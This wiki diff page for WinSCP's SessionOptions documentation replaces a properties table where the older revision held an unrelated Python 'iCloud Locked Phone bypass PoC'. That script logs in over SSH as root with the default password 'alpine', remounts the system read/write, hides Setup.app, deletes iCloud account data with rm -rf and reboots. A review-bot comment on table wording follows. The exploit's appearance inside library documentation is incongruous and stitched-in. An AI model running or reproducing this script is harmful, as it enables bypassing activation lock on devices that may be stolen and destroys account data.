Differences
This shows you the differences between the selected revisions of the page.
library_sessionoptions 2021-09-01 | library_sessionoptions 2023-09-28 (current) | ||
Line 21: | Line 21: | ||
| SessionOptions() | Default constructor. | | | SessionOptions() | Default constructor. | | ||
- | """ | + | ===== [[properties]] Properties ===== |
- | iCloud Locked Phone bypass PoC | + | ^ Name ^ Description ^ |
- | you need to get the SSH server on your iDevice running first | + | | FtpMode ==FtpMode== | [[ftp_modes|FTP mode]]. Possible values are ''FtpMode.Passive'' (default) and ''FtpMode.Active''. | |
- | """ | + | | FtpSecure ==FtpSecure== | [[ftps#methods|FTPS mode]]. Possible values are ''FtpSecure.None'' (default), ''FtpSecure.Implicit'' and ''FtpSecure.Explicit''. | |
- | import subprocess | + | | <del>bool ==GiveUpSecurityAndAcceptAnySshHostKey==</del> | Give up security and accept any [[ssh_verifying_the_host_key|SSH host key]]. To be used in exceptional situations only, when security is not required. When set, log files will include warning about insecure connection. To maintain security, use [[#sshhostkeyfingerprint|''SshHostKeyFingerprint'']]. //Obsoleted, use [[#sshhostkeypolicy|''SshHostKeyPolicy.GiveUpSecurityAndAcceptAny'']] instead.// | |
- | import paramiko | + | | bool ==GiveUpSecurityAndAcceptAnyTlsHostCertificate== | Give up security and accept any FTPS/WebDAVS server [[tls#certificate|TLS/SSL certificate]]. To be used in exceptional situations only, when security is not required. When set, log files will include warning about insecure connection. To maintain security, use [[#tlshostcertificatefingerprint|''TlsHostCertificateFingerprint'']]. | |
- | + | | string ==HostName== | Name or IP of the host to connect to. Mandatory property. In a form of ''example.com'' or ''192.0.2.0''. | | |
- | RPORT = 44 | + | | string ==Name== | Returns a generated name of a session, based on available information -- typically ''UserName@HostName''. Read-only. | |
- | LPORT = 2222 | + | | string ==NewPassword== | When set, tries to [[task_change_password|change password]] to the new one. | |
- | password = "alpine" | + | | string ==Password== | Password for authentication. | |
- | + | | int ==PortNumber== | Port number to connect to. Keep default ''0'' to use the default port for the protocol. | | |
- | iproxy = subprocess.Popen(["iproxy", str(LPORT), str(RPORT)], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT) | + | | string ==PrivateKeyPassphrase== | Passphrase for encrypted private keys and client certificates. | |
- | ssh = paramiko.SSHClient() | + | | Protocol ==Protocol== | Protocol to use for the session. Possible values are ''Protocol.Sftp'' (default), ''Protocol.Scp'', ''Protocol.Ftp'', ''Protocol.Webdav'' and ''Protocol.%%S3%%''. \\ When set to ''%%S3%%'', and [[#hostname|''HostName'']] is not set yet, it is set to ''s3.amazonaws.com'' and [[#secure|''Secure'']] is enabled. | |
- | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | + | | string ==RootPath== | WebDAV root path or S3 bucket path. Set, when the HTTP server root or S3 bucket list is not accessible. | |
- | print("Initiating SSH connection") | + | | bool ==Secure== | Use encrypted connection (TLS/SSL) with WebDAV or S3. Default is ''false''. | |
- | while True: | + | | [[dotnet>system.security.securestring|SecureString]] ==SecureNewPassword== | When set, tries to [[task_change_password|change password]] to the new one. Use instead of [[#newpassword|''NewPassword'']] to reduce a number of unencrypted copies of the password in memory. | |
- | ···try: | + | | [[dotnet>system.security.securestring|SecureString]] ==SecurePassword== | Encrypted password for authentication. Use instead of [[#password|''Password'']] to reduce a number of unencrypted copies of the password in memory. | |
- | ·······ssh.connect('localhost', username='root', password=password, port=LPORT) | + | | [[dotnet>system.security.securestring|SecurePrivateKeyPassphrase]] ==SecurePrivateKeyPassphrase== | Encrypted passphrase for encrypted private keys and client certificates. Use instead of [[#privatekeypassphrase|''PrivateKeyPassphrase'']] to reduce a number of unencrypted copies of the passphrase in memory. | |
- | ·······break | + | | string ==SshHostKeyFingerprint== | Fingerprint of SSH server [[ssh_verifying_the_host_key|host key]] (or several alternative fingerprints separated by semicolon). It makes WinSCP automatically [[scripting#hostkey|accept host key]] with the fingerprint. Use SHA-256 fingerprint of the host key. Mandatory for SFTP/SCP protocol.((You can leave the property ''null'', if you set [[#sshhostkeypolicy|''SshHostKeyPolicy'']] to a different value than ''SshHostKeyPolicy.Check''.)) //Learn how to [[faq_hostkey|obtain host key fingerprint]]//.··| |
- | ···except: | + | | SshHostKeyPolicy ==SshHostKeyPolicy== | SSH host key policy. Use the default ''SshHostKeyPolicy.Check'' to [[ssh_verifying_the_host_key|verify the host key]] against [[#sshhostkeyfingerprint|''SshHostKeyFingerprint'']]. Use ''SshHostKeyPolicy.GiveUpSecurityAndAcceptAny'' to give up a security and accept any SSH host key. To be used in exceptional situations only, when security is not required. When set, log files will include warning about insecure connection. Use ''SshHostKeyPolicy.AcceptNew'' to automatically accept host key of new hosts. The known keys are cached in registry. | |
- | ·······print("Failed, retrying") | + | | string ==SshPrivateKey== | SSH [[public_key#private|Private key file]] contents. | |
- | ·······continue | + | | string ==SshPrivateKeyPath== | Full path to SSH [[public_key#private|private key file]]. | |
- | print("Connection established") | + | | string ==TlsClientCertificatePath== | Full path to [[tls#client_certificate|TLS/SSL client certificate]]. | |
- | print("Mounting filesystem as read/write") | + | | string ==TlsHostCertificateFingerprint== | Fingerprint of FTPS/WebDAVS server [[tls#certificate|TLS/SSL certificate]] to be automatically accepted (useful for certificates signed by an untrusted authority). Use SHA-256 fingerprint of the certificate. | |
- | ssh.exec_command("mount -o rw,union,update /") | + | | TimeSpan ==Timeout== | Server response timeout. Defaults to 15 seconds. | |
- | print("Cleaning mount_rw file") | + | | int ==TimeoutInMilliseconds== | Alternative to [[#timeout|''Timeout'']]. Particularly useful for COM hosts, that cannot use ''TimeSpan'', such as Visual Basic. | |
- | ssh.exec_command('echo "" > /.mount_rw') | + | | string ==UserName== | Username for authentication. Mandatory property. | |
- | print("Hiding Setup.app") | + | | <del>bool ==WebdavSecure==</del> | Obsolete. Use [[#secure|''Secure'']]. | |
- | ssh.exec_command("mv /Application/Setup.app /Application/Setup.app.backup") | + | |
- | print("Clearing UI cache") | + | |
- | ssh.exec_command("uicache --all") | + | |
- | print("Clearing iCloud user") | + | |
- | ssh.exec_command("rm -rf /var/mobile/Library/Accounts/*") | + | |
- | print("Respringing device") | + | |
- | ssh.exec_command("killall backboardd") | + | |
- | print("Finishing exploit script") | + | |
- | print("Restarting your device") | + | |
- | ssh.exec_command("reboot") | + | |
- | iproxy.terminate() | + | |
- | iproxy.kill() | + | |
===== Methods ===== | ===== Methods ===== |
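Review bot: In the added ''SecurePrivateKeyPassphrase'' row, the type link is labelled with the property name (''[[dotnet>system.security.securestring|SecurePrivateKeyPassphrase]]''), while the ''SecureNewPassword'' and ''SecurePassword'' rows label the same link target ''SecureString''. Change the label to ''SecureString'' so the type column is consistent. In the ''SshHostKeyPolicy'' row, "give up a security" should read "give up security", matching the wording of the two ''GiveUpSecurityAndAcceptAny...'' rows. The same row cautions against ''GiveUpSecurityAndAcceptAny'' but describes ''AcceptNew'' with no caveat. It is worth stating there that the first connection to a new host is accepted without verification, and pointing to ''SshHostKeyFingerprint'' for hosts whose key is known in advance. The ''SshHostKeyFingerprint'' row also has stray spaces before its closing ''|''.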